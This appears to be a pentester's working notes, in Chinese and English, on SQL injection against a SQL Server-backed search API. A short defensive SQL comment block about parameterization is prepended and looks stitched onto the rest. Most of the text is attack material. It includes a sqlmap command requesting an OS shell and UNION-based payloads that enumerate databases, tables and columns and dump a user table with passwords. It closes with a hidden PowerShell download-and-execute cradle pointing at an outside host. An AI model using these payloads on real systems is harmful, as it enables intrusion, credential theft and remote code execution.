
Sqlserver数据库sql注入payload

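-- Parameterized form of the search query. The original concatenated the two
-- request fields straight into the LIKE patterns ('%+txt1+%'), which is why a
-- single quote in txt1 terminates the pattern early and the rest of the input
-- is parsed as SQL. Binding the values as @txt1/@txt2 keeps them data no matter
-- which characters they contain.
-- NOTE: bound values still act as LIKE patterns -- if a literal substring match
-- is intended, escape '%', '_' and '[' in the application and add an ESCAPE
-- clause. The column list of table a is not visible here, so * is kept; name
-- the columns the caller actually reads once they are known.
select *
from a
where txt1 like '%' + @txt1 + '%'
  and txt2 like '%' + @txt2 + '%';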

-- Not a valid statement: this appears to be what the search query becomes once
-- txt1 carries the value shown in the request/response pair further down
-- ("1' /* */"). The injected quote closes the first LIKE pattern, the rest of
-- the template is left dangling, and SQL Server answers with a syntax error
-- that the API returns to the client verbatim (see the SqlException text below).
-- Defensive fix: bind txt1/txt2 as parameters instead of concatenating them,
-- and return a generic error instead of the driver's message.
select * from a where aaa like '%1' /* */ %' or c.goodsname like '%1' /* */%'

利用:
python3 sqlmap.py -r zjjx2.txt --random-agent --tamper=space2comment,between --delay=5 --dbms=mssql --os-shell

{"txt1":"1' /* */","txt2":"1","pageindex":1,"pagesize":10} {"error":{"Message":"' or c.goodsname like ' 附近有语法错误。\r\n字符串 ')' 后的引号不完整。","Type":"System.Data.SqlClient.SqlException"}}

'ASP.NET RequestValidationMode (Microsoft)'

num 1,2,3,4

str 5 用户表:UDQUserData ClientYPerson AccountSystemVersionInfo UMGFiles BDO_INFOPASS Intertask Roles
person BDO_Register dpv_corpmanager X_person sqlmapoutput


%27+UnIoN+SeLeCt+1,+2,+3,+db_name(),+5,+6,+7,+8+--

%27+UnIoN+SeLeCt+1,+2,+3,+4,+db_name(),+6,+7,+8,+9,+10,+11,+12,+13,+14,+15+--

(select @@version)

数据库名爆出
%27+UnIoN+aLl+SeLeCt+1,+2,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+13,+db_name(),+15+--

数据表爆出
%27+UnIoN+aLl+SeLeCt+1,+2,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+name,+db_name(),+15+FroM+zbb2b_skyy..sysobjects+WheRe+xtype+=+0x5500+--

爆出来字段

不行的
%27+UnIoN+aLl+SeLeCt+1,+2,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+name,+db_name(),+15+FroM+zbb2b_skyy..syscolumns where id=(select id from zbb2b_skyy..sysobjects+ where+name=0x73006C005F007500730065007200)+--

可以的
%27+UnIoN+aLl+SeLeCt+1,+2,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+13,+(sElEct tOp 1 col_name(object_id('UDQUserData'),1) fRoM sysobjects),+15+--
%27+UnIoN+aLl+SeLeCt+1,+2,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+13,+(sElEct tOp 1 col_name(object_id('person'),9) fRoM sysobjects),+15+--


表结构

sqlmapoutput id data

person表结构 -- P_LSM ,P_NAME ,WORK_NO,PASSWORD,P_STATE,P_LEVER,LastLoginTime,spellcode,LINKCALL

查询用户表
%27+UnIoN+aLl+SeLeCt+1,+P_LSM,+3,+4,+null,+6,+7,+8,+9,+10,+11,+12,+13,+P_NAME,+15+FrOm+person+--

cs
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.8.106:8801/a'))"

